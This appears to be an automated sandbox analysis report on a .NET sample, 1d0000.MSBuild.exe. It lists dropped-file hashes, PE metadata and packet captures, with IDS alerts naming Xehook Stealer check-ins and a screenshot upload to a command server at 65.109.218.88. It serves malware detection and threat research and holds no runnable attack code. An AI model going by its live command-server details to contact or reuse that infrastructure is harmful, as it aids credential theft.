SSDEEP:	24:ML9E4KQwKDE4KGKZI6Kha1qE4GIs0E4KCKIE4TKBGKoZAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oa1qHGIs0HKCtHTHhAu
MD5:	4498136F7C115EAA76D9BDA4497E42DE
SHA1:	D490DC922B978B5657BFB5D611285343C27B2403
SHA-256:	51FB932FFE68E1134CD2B88F4AB0CFB10DC266AD910B0A3949A98F2A6E9AD197
SHA-512:	C28DC4E3D78FC7CB4FA976832ECF75F0A915338A87888CADECAEDB67AFE7267FB638308B8FD48E07E10724A0AE88D7AFA0492D764E842433828AD58115AAC171
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkzaqcga.nqy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhpu5wea.rea.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7284070018712265
Encrypted:	false
SSDEEP:	96:hEIVuCQP8zkvhkvCCtI6hd5UkwHePnd5UkBHePJ:hEIViPIVhd5Znd5CJ
MD5:	9B42AC600224541799FA2B281B77F6E0
SHA1:	4691BC360C4E677AA902BD98610E671B7C07AADB
SHA-256:	1B9706C1A3EC3CF48BBF07D885F506D4846F5A8392BA6EF9D3DA3D00CF7D61A8
SHA-512:	9B367B75473773ADC51EC2B9E03C8FA9A6088776A82CBF6ABF878E96CFEEF9CD1447867BF20D72B8DCA500CFC4F258FF93874FD7847454E658317565CB4F04FE
Malicious:	false
Preview:	...................................FL..................F.".. ......Yd...$Yz;....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......0......;........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B%Y.c..........................d...A.p.p.D.a.t.a...B.V.1.....%Y.c..Roaming.@......EW)B%Y.c...........................q..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B%Y.c............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B%Y.c..............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B%Y.c....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B%Y.c....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B%Y.c.....0..........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QUF1NVVHW3OTUB5EOR5A.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7284070018712265
Encrypted:	false
SSDEEP:	96:hEIVuCQP8zkvhkvCCtI6hd5UkwHePnd5UkBHePJ:hEIViPIVhd5Znd5CJ
MD5:	9B42AC600224541799FA2B281B77F6E0
SHA1:	4691BC360C4E677AA902BD98610E671B7C07AADB
SHA-256:	1B9706C1A3EC3CF48BBF07D885F506D4846F5A8392BA6EF9D3DA3D00CF7D61A8
SHA-512:	9B367B75473773ADC51EC2B9E03C8FA9A6088776A82CBF6ABF878E96CFEEF9CD1447867BF20D72B8DCA500CFC4F258FF93874FD7847454E658317565CB4F04FE
Malicious:	false
Preview:	...................................FL..................F.".. ......Yd...$Yz;....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......0......;........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B%Y.c..........................d...A.p.p.D.a.t.a...B.V.1.....%Y.c..Roaming.@......EW)B%Y.c...........................q..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B%Y.c............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B%Y.c..............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B%Y.c....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B%Y.c....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B%Y.c.....0..........

C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe

Download File

Process:	C:\Users\user\Desktop\1d0000.MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (18675), with no line terminators
Category:	dropped
Size (bytes):	18680
Entropy (8bit):	5.917803540927867
Encrypted:	false
SSDEEP:	384:lRRxpjNqsR2RRxpjNqsR6dHQvEhdePlDsU28J7u5vzfmCRdZW1ERCMiE2:rzmz6dwvS49DsJ8Bu5vzfmCR3/iE2
MD5:	4ADD4FC3CDA4632C6E88EE7FF4829FFD
SHA1:	0DC2C6563FBEF948D06A813A58779D3A61E8FDF5
SHA-256:	4228EBB79607E88B781ED422A11BEB7EFD80090C241C917D600D23E5A258B8DD
SHA-512:	CC0C2A6AB4EAE691B41487A3F63B44D1F90A024122883DAD4DDC5229F2494A130B00EE13122941E029FBB5F889EDB856A72297ECB7B66A63F3C8BEFFE2609A64
Malicious:	true
Preview:	<!doctype html><html prefix="og: http://ogp.me/ns#" lang="en"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title data-react-helmet="true">Are you not a robot?</title><meta data-react-helmet="true" property="og:title" content="Yandex"><meta data-react-helmet="true" property="og:description" content="Finds everything"><meta data-react-helmet="true" property="og:image" content="https://yastatic.net/s3/home-static/_/90/9034470dfcb0bea0db29a281007b8a38.png"><link rel="stylesheet" href="/captcha_smart.bad0b1be15caa82f8807.min.css?k=1724945226070"><style>@media only screen and (min-width:651px) and (prefers-color-scheme:light){body{background-image:url('https://captcha-backgrounds.s3.yandex.net/static/default-background.jpg')}.LogoLink{background-image:url('data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iODYiIGhlaWdodD0iMzYiIHZpZXdCb3g9IjAgMCAzNzggOTEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgZml

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.3693810168601965
Encrypted:	false
SSDEEP:	6144:qFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNliL:CV1QyWWI/glMM6kF7/q
MD5:	608AA8655647A897CCF600A8AE90EAA5
SHA1:	81B535404DE3450B92E7BFC063E33B0C054D5B7E
SHA-256:	2FDB57E3A2438145195D798663C37730C83F9D5DB8CEBC23F3BA269355671D81
SHA-512:	317378FD7FB153E460177FD1861CF2D16E881388D430816340E95C0EFDE6B9217012AFDEAE31D50B2BF213CC84148B68D168CCE8A73F9A2FE962D30FCB3FFFCD
Malicious:	false
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...<................................................................................................................................................................................................................................................................................................................................................3?..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.324127622058963
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	1d0000.MSBuild.exe
File size:	154'624 bytes
MD5:	41cf033d05ae0e2c5238a7932cf2dc77
SHA1:	df885092f397a0a70f26b98c5abb35253d2cb06c
SHA256:	f307cd4cb26d2d851ca55e9ab039656247ffd3b01b89ad0dcd32adf8e689724b
SHA512:	eb1a3d4fe54c01c5ed6eb58208fed72aaf628aa6df60f5711f0e8e119a68517d7bc4112c5387858803072b144510fbd7c74f5e44853d3aefa5685979f755ef48
SSDEEP:	3072:FzFIwXIUVadV/NqI9tw5ojnsbkps3CUBB8owEKctGE:RXcV/55jnsbkps3CUBB81EK
TLSH:	BEE3979C72A476DFD86BC572DEA81CA4EB60787B931B8207A41311AD9E4C987CF141F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0..R...........q... ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x42710e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66C8899D [Fri Aug 23 13:07:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00632000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x270c0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x28000	0x55e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x25114	0x25200	97d08115f9e8b759c2c2d9fba4976d0e	False	0.3732901936026936	SysEx File -	5.3364911962924255	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x28000	0x55e	0x600	d0f6816dc3a649ccbe3350abe538303c	False	0.3984375	data	3.91371853929423	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2a000	0xc	0x200	310037971a730240b1e6a6c653320f5d	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x280a0	0x2d4	data			0.430939226519337
RT_MANIFEST	0x28374	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-05T14:29:13.959077+0200	2051457	ET MALWARE Xehook Stealer CnC Checkin	1	192.168.2.8	49706	65.109.218.88	80	TCP
2024-09-05T14:29:13.959077+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49706	65.109.218.88	80	TCP
2024-09-05T14:29:14.649122+0200	2051458	ET MALWARE Xehook Stealer CnC Checkin - Server Response	1	65.109.218.88	80	192.168.2.8	49706	TCP
2024-09-05T14:29:16.248275+0200	2843856	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2	1	192.168.2.8	49708	65.109.218.88	80	TCP
2024-09-05T14:29:17.912548+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49708	65.109.218.88	80	TCP
2024-09-05T14:29:18.305457+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49708	65.109.218.88	80	TCP
2024-09-05T14:29:20.601787+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49710	87.250.250.50	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2024 14:29:06.727446079 CEST	49673	443	192.168.2.8	23.206.229.226
Sep 5, 2024 14:29:06.836704016 CEST	49676	443	192.168.2.8	52.182.143.211
Sep 5, 2024 14:29:07.039844990 CEST	49672	443	192.168.2.8	23.206.229.226
Sep 5, 2024 14:29:08.024292946 CEST	49671	443	192.168.2.8	204.79.197.203
Sep 5, 2024 14:29:08.383507013 CEST	49677	80	192.168.2.8	192.229.211.108
Sep 5, 2024 14:29:11.064666986 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:11.064697981 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:11.064779997 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:11.085342884 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:11.085355043 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:11.705267906 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:11.705332994 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:11.751666069 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:11.751688004 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:11.752063036 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:11.805370092 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:11.863934040 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:11.908510923 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:12.198340893 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:12.198367119 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:12.198374033 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:12.198401928 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:12.198421001 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:12.198430061 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:12.198476076 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:12.198489904 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:12.198512077 CEST	443	49705	149.154.167.99	192.168.2.8
Sep 5, 2024 14:29:12.198528051 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:12.198554039 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:12.344254017 CEST	49705	443	192.168.2.8	149.154.167.99
Sep 5, 2024 14:29:12.351639986 CEST	49706	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:12.356595993 CEST	80	49706	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:12.356713057 CEST	49706	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:12.356852055 CEST	49706	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:12.361649990 CEST	80	49706	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:13.207253933 CEST	80	49706	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:13.209711075 CEST	49706	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:13.424206018 CEST	80	49706	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:13.424268007 CEST	49706	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:13.425028086 CEST	80	49706	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:13.940529108 CEST	80	49706	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:13.958990097 CEST	80	49706	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:13.959076881 CEST	49706	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:14.644121885 CEST	49706	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:14.649122000 CEST	80	49706	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:14.649193048 CEST	49706	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:14.654109001 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 5, 2024 14:29:14.658926010 CEST	80	49707	208.95.112.1	192.168.2.8
Sep 5, 2024 14:29:14.658992052 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 5, 2024 14:29:14.659105062 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 5, 2024 14:29:14.663836956 CEST	80	49707	208.95.112.1	192.168.2.8
Sep 5, 2024 14:29:15.120493889 CEST	80	49707	208.95.112.1	192.168.2.8
Sep 5, 2024 14:29:15.164807081 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 5, 2024 14:29:15.771441936 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 5, 2024 14:29:15.771464109 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:15.776360035 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:15.776465893 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:15.776657104 CEST	80	49707	208.95.112.1	192.168.2.8
Sep 5, 2024 14:29:15.776683092 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:15.776705980 CEST	49707	80	192.168.2.8	208.95.112.1
Sep 5, 2024 14:29:15.781440973 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.139096022 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.196924925 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.197065115 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.197094917 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.197139978 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.197237968 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.197247982 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.197257042 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.197276115 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.197321892 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.197377920 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.197387934 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.197396994 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.197424889 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.197443962 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.197556973 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.197566986 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.197622061 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.203217983 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.203358889 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.203413010 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.203422070 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.203429937 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.203493118 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.203517914 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.203655005 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.203670025 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.203716040 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.243056059 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.243256092 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248169899 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248223066 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248245001 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248262882 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248275042 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248302937 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248336077 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248339891 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248357058 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248384953 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248456955 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248466969 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248512030 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248512983 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248522997 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248533010 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248564959 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248611927 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248632908 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248646975 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248656034 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248656034 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248665094 CEST	80	49708	65.109.218.88	192.168.2.8
